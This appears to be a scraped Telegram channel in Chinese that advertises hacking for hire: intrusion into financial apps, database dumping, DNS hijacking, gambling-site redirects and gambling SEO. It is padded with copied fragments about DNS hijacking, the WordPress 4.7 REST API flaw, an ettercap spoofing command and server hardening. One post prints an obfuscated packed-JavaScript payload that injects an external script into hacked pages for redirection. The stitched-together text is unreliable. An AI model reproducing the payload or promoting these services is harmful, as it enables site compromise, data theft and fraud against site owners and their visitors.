黑客渗透 金融劫持 BC域名跳转
17.8K subscribers
1.79K photos
19 videos
2 files
162 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回
假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址
域名劫持一方面可能影响用户的上网体验,用户被引到假冒的网站进而无法正常浏览网页,而用户量较大的网站域名
被劫持后恶劣影响会不断扩大;另一方面用户可能被诱骗到冒牌网站进行登录等操作导致泄露隐私数据
黑客技术团咨询:@hacker_HouZiM
🔥3🥰2👏21👍1🎉1🤩1
WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到 WordPress 中,由此也引发了一些安全性问题。近日,一个由 REST API 引起的影响 WordPress 4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致 WordPress 所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。
🥰41👍1🔥1👏1🎉1🤩1
由于域名劫持往往只能在特定的被劫持的网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常

的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持

通常相伴的措施——封锁正常DNS的IP
🤩32👏2🔥1🥰1🎉1
DNS欺骗(DNS Spoofing)

正常情况下,用户使用浏览器打开天涯论坛登录,然后DNS服务器 通过DNS访问到论坛的服务器,返回合法登录网页

.DNS欺骗
在kali终端输入
(kalikali)-[~]ettercap-pkexec -G#或
(kalikali)-[~]sudo -E ettercap -1
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🔥4🎉3👍2🤩2👏1
域名劫持是指域名被DNS通过篡改域名解析的过程,将原本属于某个域名的IP地址指向其它恶意网站或服务器的行为。

这种方式被叫因为域名劫持引流。
👏3👍2🔥21🎉1🤩1
劫持发现、定位以及解决的最佳实践

劫持发现、定位以及解决的最佳实践
内容介绍:
一、 常见网站劫持场景
二、 典型场景分析&DEMO
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🔥53🥰3🤩3👏1
阿里云云拨测的劫持分析 Demo:
打开阿里云官网,登录到阿里云的控制台,找到应用实时监控服务,点击进入云拨测服务,新建拨测任务,输入拨测的名字,劫持测试,输入要监测网站的域名,以阿里云为例,http://www.aliyun.com.任务类型选择“浏览-Chrome全元素(HTTP1.1/2.0)”,点击下一步,搜索监测点,建议选择真实用户的监测点,选择“全国主要省份城市网民(LM)”,如果说这些监测点并不在用户监测的覆盖范围之内,可以选择自定义监测点,点击下一步,对于劫持分析最重要的几个劫持配置就是 DNS 劫持白名单、页面篡改和流量劫持三个参数,分别对应着 DNS 劫持、内容劫持和网络跳转劫持。这里以 DNS 劫持为例,首先输入监测域名,输入阿里云的首页,在检测域名下,需要输入冒号,输入域名解析的正确 IP 地址,阿里云肯定有很多的 IP 地址,
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🔥3👏2🎉21👍1🤩1
☘️百度首页现词出租、百度搜索博彩关键词、指定做词。
☘️百度博彩关键词引流让你天天新增达标早下班。
☘️体育、棋牌、真人、电子、电竞、 色量!
☘️百度首页关键词,上万词霸屏刚上线 。全部首页1-3位置。
☘️全行业百度首页词最实力、 有实力来验证。
☘️所有词均保证首页——见效果付款就是这么有实力。
黑客技术团咨询:@hacker_HouZiM
4👏3👍2🎉2🔥1
电信dns劫持了GitHub io的域名?
前些天装atilo时用到了它的GitHub第三方库,那时候就发现它的github.io域名被解析为127.0.0.1。

那时还没多想,以为是它的域名设置出了问题,(虽然当时换dns成功装上去了就是)

结果今天再次访问别的github.io域名直接就是网络错误了,nslookup一看吓一跳嗷

这里还可以改路由器的hosts
黑客技术团咨询:@hacker_HouZiM
2👍2🎉2🤩2🔥1👏1
破解 Wordpress 4.7.0-1

WordPress 的一个漏洞,该漏洞允许未经身份验证的攻击者通过滥用 WordPress REST API 中的一个漏洞轻松编辑他们喜欢的任何博客文章。我不会写关于该漏洞的详细信息,因为正如所提到的,原始博客文章中已经讨论过了。相反,我将向您展示如何使用我们的Rest工具轻松利用此问题。

让我们为本次练习设置一个快速测试环境。我们将使用 docker compose 来快速启动它。创建一个包含以下内容的 docker-compose.yml 文件
黑客技术团咨询:@hacker_HouZiM
🎉5🔥31🤩1
域名解析(DNS)的基本原理是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络

地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。
🎉3🤩31👍1🔥1👏1
HTTPDNS 服务

开通服务,在 HTTPDNS 服务提供商出注册账号,开通 HTTPDNS 服务。

控制台添加域名

在HTTPDNS提供商的服务台申请HTTPDNS服务,这可能涉及费用(一般的HTTPDNS 服务提供商会有一定的免费查询次数,如果超过了这个次数就需要额外的费用)。假设我们 通过控制台获得了 HTTPDNS 服务商提供的账号,就直接在控制台上提价所需要解析的域 名记录,一般几分钟之后会在 HTTPDNS 服务端生效。
黑客技术团咨询:@hacker_HouZiM
🎉32👏2👍1🔥1🤩1
“ 网络映射器(Network Mapper)”)是 Kali Linux 上很受欢迎的信息收集工具之一。换句话说,它可以获取有关主机的信息:其 IP 地址、操作系统检测以及网络安全的详细信息(如开放的端口数量及其含义)。
👍4🤩2🔥1🥰1👏1🎉1
首先得让网站正常访问不让网站从百度搜索直接跳转,那么这个跳转代码一般都会加在首页文件最顶部。打开首页文件查看下源代码就会看到加密的代码也就是跳转的代码如图:
黑客技术团咨询:@hacker_HouZiM
👍2🔥2🤩21🥰1👏1🎉1
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
3👏3👍2🔥1🥰1🤩1
另一个网站用的是dz论坛程序也是被跳转了,代码被修改加在了config目录下的config_global.php文件里

渗透技术团队,可渗透,可拿后台,可更改服务器,可入侵等等
黑客技术团咨询:@hacker_HouZiM
👏32👍2🎉2🤩2
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 BC劫持 域名跳转 服务器进入等等
黑客技术团咨询:@hacker_HouZiM
3🔥2🥰2👍1🎉1🤩1
首页也是被增加了和上述第一张图的代码,随即我们先对这3个站点的恶意跳转代码进行了清除,使网站正常访问,到这里并不是解决掉了问题哦! 这只是单纯的删除恶意跳转的代码,因为根源问题是在程序有漏洞导致被黑客入侵上传了webshell俗称网站木马后门.因为之前客户就说过是反复性质的被篡改!清理掉后没过多久就又被篡改了。所以要对程序漏洞进行详细的漏洞修补和代码的安全审计以及后门木马的清理和服务器安全的防护设置,才能确保网站日后的正常运行。
3🥰3🎉2👏1🤩1
1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。
👍4🤩32🔥2👏1
针对这三个网站的程序代码进行了全面的人工安全代码审计以及漏洞检测修补和后门木马的清理,发现dedecms和dz论坛的程序存在getshell和sql注入获取管理员账户和密码,以及上传绕过漏洞。另外一个站是因为服务器的目录安全权限没做好,导致可以跨目录写入才会导致这个站也被篡改了,所以说如果服务器安全没做好,网站安全即使做的再牛逼也毫无用处
🔥3🥰3🎉2👏1🤩1